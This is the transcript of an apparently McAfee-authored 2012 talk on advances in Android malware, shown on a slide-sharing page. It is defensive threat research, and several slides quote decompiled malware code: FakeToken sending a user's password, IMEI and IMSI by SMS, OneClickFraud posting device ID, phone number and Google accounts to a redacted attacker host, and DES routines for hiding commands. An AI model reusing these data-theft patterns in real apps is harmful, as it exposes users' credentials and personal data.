• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah
 

Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah

on

  • 1,157 views

Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah

Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah

Statistics

Views

Total Views
1,157
Views on SlideShare
1,157
Embed Views
0

Actions

Likes
1
Downloads
0
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah Isn't it all just SMS-sending trojans?: Real Advances in Android Malware by Jimmy Shah Presentation Transcript

    • Isnt it all just SMS-sending trojans?:Real advances in Android MalwareJimmy ShahMobile Security Researcher McAfee Confidential—Internal Use Only
    • Lets look at the numbers
    • Not just malware ... Malware vs PUP 100.0% 90.0% 50.7% 80.0% 70.0% 60.0% 50.0% 40.0% 49.3% 30.0% 20.0% 10.0% 0.0%
    • Almost everything but SMS-sending trojans By Category Downloader/Installer 10.1% HackTool 4.3% Backdoor/Botnet 27.5% Rooting malware 2.9% Exploit 23.2% Fraud 2.9% Sends Premium SMS 18.8% Adware 8.7% Spyware 21.7% Send Handset Info 0.0% 5.0% 10.0% 15.0% 42.0% 20.0% 25.0% 30.0% 35.0% 40.0% 45.0%
    • Attacker Tricks
    • Attacker Tricks - Encryption• Simple – Obfuscations • Hiding SMS numbers/message text within plaintext HTML files<link rel="stylesheet" type="text/css" href="/en/shared/core/2/css/css.ashx?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;cspSearchComponent;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVerticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"></script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Getproduct information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c – Substitution cipher • Config file containing encrypted SMS numbers/message text <SMS#>::<MSG>::241.55руб. <SMS#>::<MSG>::173.88руб. <SMS#>::<MSG>::86.00руб.
    • Attacker Tricks - Encryption• Complex – Symmetric cipher • DES byte abyte1[] = k.b; DESKeySpec deskeyspec = new DESKeySpec(abyte1); javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec); Cipher cipher = Cipher.getInstance("DES"); b = cipher; cipher.init(2, secretkey); • Encrypt URL queries and C&C commands • Encrypt/decrypt config file – URLs, next connect time – Encrypt/decrypt C&C commands – Decrypt root exploits
    • Attacker Tricks – Fraud• Pretending to be a legitimate app – Not the same as injecting malicious code – New or reused code that simulates the real app • Includes malicious functions • Almost just malicious code ./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class ./token/bot/StartSettings.class ./com/example/android/service/R$id.class ./token/bot/WebApi.class ./com/example/android/service/R$raw.class ./token/bot/CatchResult.class ./com/example/android/service/Main$KitchenTimerReceiver.class ./token/bot/SendSmsResult.class ./com/example/android/service/KitchenTimerService$2.class ./token/bot/SettingsSet.class ./com/example/android/service/R$attr.class ./token/bot/ScreenItem.class ./com/example/android/service/R$layout.class ./token/bot/AutorunReceiver.class ./com/example/android/service/R.class ./token/bot/ServerResponse.class ./com/example/android/service/Main.class ./token/bot/MainActivity.class ./com/example/android/service/R$drawable.class ./token/bot/ThreadOperation.class ./com/example/android/service/KitchenTimerService$1.class ./token/bot/AlarmReceiver.class ./com/example/android/service/KitchenTimerService.class ./token/bot/ThreadOperationListener.class ./com/example/android/service/Main$1.class ./token/bot/SmsReciver.class ./com/example/android/service/R$string.class ./token/bot/MainApplication.class ./token/bot/MainService.class ./token/bot/SmsItem.class Android/OneClickFraud ./token/bot/HttpParam.class ./token/bot/Settings.class ./token/bot/UpdateActivity.class ./token/bot/MainActivity$1.class Android/FakeToken
    • Attacker Tricks – Fraud• Android/FakeToken – Fake security token app • Customized for different banks – App asks for the users password and displays fake soft token public void sendPass(String paramString) { try { if (!Settings.saved.sendInitSms) { Settings.saved.sendInitSms = true; String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString; MainService.sendSms(Settings.saved.number, str); MainApplication.settings.save(this.context); } new Thread(new ThreadOperation(this, 1, paramString)).start(); label109: return; } catch (Exception localException) { break label109; } }
    • Attacker Tricks – Fraud• Android/OneClickFraud – Fake adult entertainment app • App asks for the user to pay for a subscription to the adult site – Repeats every 5 minutes public void onReceive(Context paramContext, Intent paramIntent) { kitchenTimerService.schedule(300000L); setContentView(2130903040); Account[] arrayOfAccount;
    • Attacker Tricks – Fraud• Android/OneClickFraud – Sends user information including Google account to the attacker if (ctf.intValue() == 0) { Main localMain = Main.this; Integer localInteger = Integer.valueOf(1); localMain.ctf = localInteger; TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); arrayOfAccount = AccountManager.get(Main.this).getAccounts(); str1 = ""; int i = arrayOfAccount.length; j = 0; if (j >= i) { String str2 = doPost("http://<removed>", ""); StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>"); String str3 = localTelephonyManager.getDeviceId(); StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno="); String str4 = localTelephonyManager.getLine1Number(); Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2); Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1); startActivity(localIntent1); boolean bool = moveTaskToBack(1); } }
    • Attacker Tricks - Injecting code• Android/Moghava.A(Android/Stamper.A) – Malicious code injected into a legitimate app • Recipes for Iranian meals 12 4/19/12
    • Attacker Tricks - Injecting code• Android/Moghava.A – Real virus • Overwriting file infector – Not executable files, just image files » Specifically all of your JPGs » Designed to “photo bomb” all your photos with the Ayotollah Khomeni • Code injection: ./com/Moghava/kicker.smali ./com/Moghava/stamper$1.smali ./com/Moghava/stamper$1$1.smali ./com/Moghava/stamper.smali ./ir/sharif/iranianfoods/R$attr.smali ./ir/sharif/iranianfoods/R$styleable.smali ./ir/sharif/iranianfoods/R$menu.smali ./ir/sharif/iranianfoods/ListItemAdapter.smali ./ir/sharif/iranianfoods/IranData.smali ./ir/sharif/iranianfoods/Touch$AddImgAdp.smali ./ir/sharif/iranianfoods/TabHostActivity.smali ./ir/sharif/iranianfoods/Constants.smali – Buggy • Doesnt check if its infected a file before 13 4/19/12
    • Attacker Tricks - Injecting codelocalBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());int m = localBitmap2.getWidth();int n = localBitmap1.getWidth();int i1 = m;int i2 = n;if (i1 > i2){ i3 = localBitmap2.getWidth(); i4 = localBitmap2.getHeight(); label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888; localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig); Canvas localCanvas = new Canvas(localBitmap3); float f1 = 0.0F; float f2 = 0.0F; Paint localPaint1 = null; localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1); float f3 = 100.0F; float f4 = 300.0F; Paint localPaint2 = null; localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);}14 4/19/12
    • Attacker Tricks - Injecting code Credit: Mark Peters (Flickr ID - sneakerdog)15 4/19/12
    • Attacker Tricks – Recording Audio• Audio – DTMF(“Touch Tones”) – Telephone Calls• Initially used in academic PoCs – SoundComber • DB of IVR Converted DTMF • January 2011• Very common in spyware• Used in malware 16 4/19/12
    • Attacker Tricks – Recording Audio• Android/Nickispy – Records to AMR files – August 2011• Android/GoldenEagle – Records to AMR files – September 2011• Audio recording benefits – Trade secrets – CC# – PINs 17 4/19/12
    • Attacker Tricks - Malware Updates• Malware authors are now including update functionality – Keeping the profits rolling in and maintaining control of devices – Initially just used by mobile botnet clients• Generally only requires the permission INSTALL_PACKAGES • android.permission.INSTALL_PACKAGES• There are two main ways users are attacked – Fake legitimate updates • Ex: SYSTEM_PATCH, Android_4.0_patch • Really just trojan horses – Malware updating itself • More functions – Send sensitive user info – Exfiltrate data • New/patched payloads – Exploits 18 4/19/12
    • Attacker Tricks - Malware Updates• Real malware updates – Because even the bad guys understand that sometimes you need to patch• Usually not visual – Dont inform the users/victims – Dont depend on users to approve updates 19 4/19/12
    • Academic Research - Taplogger• Taplogger – Combination training and attack app • Reads accelerometer for keypresses • Training app is a fake icon matching game – High score = trained it to steal your pin • Two attacks – Number pad logging » PINs, CC#s,etc. – Password stealing » Screen unlock – Previous research • Touchlogger – Two parts – training and logging • ACCessory – Detects full keyboard 20 4/19/12
    • Academic Research - Taplogger21 4/19/12
    • Attacker Tricks - Rooting Exploits• Rooting Android – Good for improving security, but can leave you open to attack – Replacing firmware – Removing bloatware and security vulnerabilities• Most attackers are not interested in developing their own exploits – Function of slow patching on Android and number of parties involved in releasing new firmware • “too many chefs in the kitchen” – Leads to the same three or four common exploits and minor modifications Exploit Detected as PSneuter Exploit/RetuenSP.A Gingerbreak Exploit/Voldbrk, 18 minor variants of the same exploit Exploid Exploit/Lvedu, 26 minor variants RageAgainstTheCage Exploit/Diutes, 5 minor variants
    • Attacker Tricks – Server-Side Polymorphism• Server-side – Uses larger resources server side vs. lower powered devices – Modifying DEX files • Manual changes – Renaming source and recompiling • Automated changes – Easier than it sounds – Scriptable text changes in source
    • Attacker Tricks – Server-Side Polymorphism• One major family: Android/FakeInstaller • Main generic signature • Supplementary detections for 25 variants • Changes – By day – By hour
    • Acknowledgements
    • Acknowledgments• Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.